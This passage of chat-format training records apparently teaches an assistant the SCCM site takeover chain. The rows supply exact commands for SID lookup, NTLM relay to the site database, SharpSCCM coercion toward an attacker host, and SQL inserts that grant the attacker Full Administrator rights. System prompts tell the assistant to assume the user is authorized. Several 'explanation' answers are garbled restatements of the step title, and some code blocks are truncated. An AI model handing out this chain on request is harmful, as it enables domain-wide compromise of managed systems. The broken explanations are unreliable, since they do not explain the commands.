Step 1: retrieve the controlled user SID", "metadata": {"corpus_index": 1084, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the lookupsid.py command to sccm site takeover - step 1: retrieve the controlled user sid"}, {"role": "assistant", "content": "lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the lookupsid.py command to sccm site takeover - step 1: retrieve the controlled user sid", "response": "lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"", "metadata": {"corpus_index": 1085, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "lookupsid.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SCCM site takeover - Step 1: retrieve the controlled user SID"}, {"role": "assistant", "content": "lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SCCM site takeover - Step 1: retrieve the controlled user SID", "response": "lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"", "metadata": {"corpus_index": 1085, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. Step 1: retrieve the controlled user SID"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `lookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"`?", "response": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. Step 1: retrieve the controlled user SID", "metadata": {"corpus_index": 1085, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the from command to sccm site takeover - step 1: retrieve the controlled user sid"}, {"role": "assistant", "content": "from impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the from command to sccm site takeover - step 1: retrieve the controlled user sid", "response": "from impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))", "metadata": {"corpus_index": 1086, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "from"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for SCCM site takeover - Step 1: retrieve the controlled user SID?"}, {"role": "assistant", "content": "from impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for SCCM site takeover - Step 1: retrieve the controlled user SID?", "response": "from impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))", "metadata": {"corpus_index": 1086, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `from impacket.ldap import ldaptypes`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. Step 1: retrieve the controlled user SID"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `from impacket.ldap import ldaptypes`?", "response": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. Step 1: retrieve the controlled user SID", "metadata": {"corpus_index": 1086, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SCCM site takeover - Step 2: setup NTLM relay server"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the site database server, either on the MS-SQL (port 1433/tcp), or SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page is focusing on relaying the authentication on the MS-SQL service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SCCM site takeover - Step 2: setup NTLM relay server", "response": "The target of the NTLM relay attack must be set to the site database server, either on the MS-SQL (port 1433/tcp), or SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page is focusing on relaying the authentication on the MS-SQL service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.\n\n```bash", "metadata": {"corpus_index": 1087, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM site takeover - Step 2: setup NTLM relay server?"}, {"role": "assistant", "content": "The target of the NTLM relay attack must be set to the site database server, either on the MS-SQL (port 1433/tcp), or SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page is focusing on relaying the authentication on the MS-SQL service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM site takeover - Step 2: setup NTLM relay server?", "response": "The target of the NTLM relay attack must be set to the site database server, either on the MS-SQL (port 1433/tcp), or SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page is focusing on relaying the authentication on the MS-SQL service.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.\n\n```bash", "metadata": {"corpus_index": 1087, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about targetting MS-SQL"}, {"role": "assistant", "content": "ntlmrelayx.py -t \"mssql://siteDatabase.domain.local\" -smb2support -socks"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about targetting MS-SQL", "response": "ntlmrelayx.py -t \"mssql://siteDatabase.domain.local\" -smb2support -socks", "metadata": {"corpus_index": 1088, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out targetting MS-SQL during a pentest?"}, {"role": "assistant", "content": "ntlmrelayx.py -t \"mssql://siteDatabase.domain.local\" -smb2support -socks"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out targetting MS-SQL during a pentest?", "response": "ntlmrelayx.py -t \"mssql://siteDatabase.domain.local\" -smb2support -socks", "metadata": {"corpus_index": 1088, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of targeting SMB"}, {"role": "assistant", "content": "ntlmrelayx.py -t \"siteDatabase.domain.local\" -smb2support -socks\n```\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same SOCKS functionality, needed in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of targeting SMB", "response": "ntlmrelayx.py -t \"siteDatabase.domain.local\" -smb2support -socks\n```\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same SOCKS functionality, needed in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1089, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform targeting SMB?"}, {"role": "assistant", "content": "ntlmrelayx.py -t \"siteDatabase.domain.local\" -smb2support -socks\n```\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same SOCKS functionality, needed in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform targeting SMB?", "response": "ntlmrelayx.py -t \"siteDatabase.domain.local\" -smb2support -socks\n```\n\n=== Windows\n\nFrom Windows systems, Inveigh-Relay (Powershell) can be used as an alternative to Impacket's ntlmrelayx.py, however it does not feature the same SOCKS functionality, needed in the steps detailed below, meaning the exploitation from Windows system will need to be adapted.\n\n:::\n\nFor more insight on NTLM relay attacks and tools options, see the corresponding page on The Hacker Recipes: NTLM Relay.", "metadata": {"corpus_index": 1089, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM site takeover - Step 3: coerce authentication in the context of penetration testing"}, {"role": "assistant", "content": "The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article \"Coercing NTLM authentication from SCCM\" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).\n\nThere isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).\n\n=== Windows\n\n``powershell\nSharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"\n``\n\n:::\n\nThe rest of this page is focusing on relaying the authentication on the MS-SQL service."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM site takeover - Step 3: coerce authentication in the context of penetration testing", "response": "The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article \"Coercing NTLM authentication from SCCM\" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).\n\nThere isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).\n\n=== Windows\n\n``powershell\nSharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"\n``\n\n:::\n\nThe rest of this page is focusing on relaying the authentication on the MS-SQL service.", "metadata": {"corpus_index": 1090, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for SCCM site takeover - Step 3: coerce authentication?"}, {"role": "assistant", "content": "The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article \"Coercing NTLM authentication from SCCM\" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).\n\nThere isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).\n\n=== Windows\n\n``powershell\nSharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"\n``\n\n:::\n\nThe rest of this page is focusing on relaying the authentication on the MS-SQL service."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for SCCM site takeover - Step 3: coerce authentication?", "response": "The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article \"Coercing NTLM authentication from SCCM\" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).\n\nThere isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).\n\n=== Windows\n\n``powershell\nSharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"\n``\n\n:::\n\nThe rest of this page is focusing on relaying the authentication on the MS-SQL service.", "metadata": {"corpus_index": 1090, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the SharpSCCM.exe command for sccm site takeover - step 3: coerce authentication"}, {"role": "assistant", "content": "SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the SharpSCCM.exe command for sccm site takeover - step 3: coerce authentication", "response": "SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"", "metadata": {"corpus_index": 1091, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpSCCM.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SCCM site takeover - Step 3: coerce authentication"}, {"role": "assistant", "content": "SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SCCM site takeover - Step 3: coerce authentication", "response": "SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"", "metadata": {"corpus_index": 1091, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 3: coerce authentication. Step 3: coerce authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpSCCM.exe invoke client-push -mp \"SCCM-Server\" -sc \"$SITE_CODE\" -t \"attacker.domain.local\"`?", "response": "This command is used for sccm site takeover - step 3: coerce authentication. Step 3: coerce authentication", "metadata": {"corpus_index": 1091, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM site takeover - Step 4: Obtain an SQL console in the context of penetration testing"}, {"role": "assistant", "content": "If the NTLM relay attack is a success and was targeting the MS-SQL service with SOCKS support, an SQL console could be obtained on the SCCM database through the opened socks proxy. From UNIX-like systems, Impacket's mssqlclient (Python) can be used for that purpose.\n\n``bash\nproxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth\n`\n\nOnce the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.\n\n`\n--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');\n`\n\nIt is then possible to verify the new privileges on SCCM.\n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM site takeover - Step 4: Obtain an SQL console in the context of penetration testing", "response": "If the NTLM relay attack is a success and was targeting the MS-SQL service with SOCKS support, an SQL console could be obtained on the SCCM database through the opened socks proxy. From UNIX-like systems, Impacket's mssqlclient (Python) can be used for that purpose.\n\n``bash\nproxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth\n`\n\nOnce the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.\n\n`\n--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');\n`\n\nIt is then possible to verify the new privileges on SCCM.\n\n``", "metadata": {"corpus_index": 1092, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SCCM site takeover - Step 4: Obtain an SQL console during a pentest?"}, {"role": "assistant", "content": "If the NTLM relay attack is a success and was targeting the MS-SQL service with SOCKS support, an SQL console could be obtained on the SCCM database through the opened socks proxy. From UNIX-like systems, Impacket's mssqlclient (Python) can be used for that purpose.\n\n``bash\nproxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth\n`\n\nOnce the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.\n\n`\n--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');\n`\n\nIt is then possible to verify the new privileges on SCCM.\n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SCCM site takeover - Step 4: Obtain an SQL console during a pentest?", "response": "If the NTLM relay attack is a success and was targeting the MS-SQL service with SOCKS support, an SQL console could be obtained on the SCCM database through the opened socks proxy. From UNIX-like systems, Impacket's mssqlclient (Python) can be used for that purpose.\n\n``bash\nproxychains mssqlclient.py \"DOMAIN/SCCM-Server$\"@\"siteDatabase.domain.local\" -windows-auth\n`\n\nOnce the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.\n\n`\n--Switch to site database\nuse CM_\n\n--Add the SID, the name of the current user, and the site code to the RBAC_Admins table\nINSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (,'DOMAIN\\user',0,0,'','','','','');\n\n--Retrieve the AdminID of the added user\nSELECT AdminID,LogonName FROM RBAC_Admins;\n\n--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the \"All Objects\" scope (SMS00ALL), \n--the \"All Systems\" scope (SMS00001), \n--and the \"All Users and User Groups\" scope (SMS00004)\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00ALL','29');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00001','1');\nINSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (,'SMS0001R','SMS00004','1');\n`\n\nIt is then possible to verify the new privileges on SCCM.\n\n``", "metadata": {"corpus_index": 1092, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered 